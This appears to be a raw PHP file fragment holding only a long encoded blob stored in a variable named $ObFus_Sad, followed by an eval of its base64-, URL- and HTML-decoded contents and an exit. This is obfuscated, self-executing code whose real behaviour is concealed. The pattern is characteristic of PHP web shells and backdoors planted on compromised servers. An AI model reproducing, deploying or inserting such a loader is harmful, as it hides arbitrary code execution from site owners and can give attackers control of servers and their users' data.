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";
eval(htmlspecialchars_decode(urldecode(base64_decode($ObFus_Sad))));
exit;
?>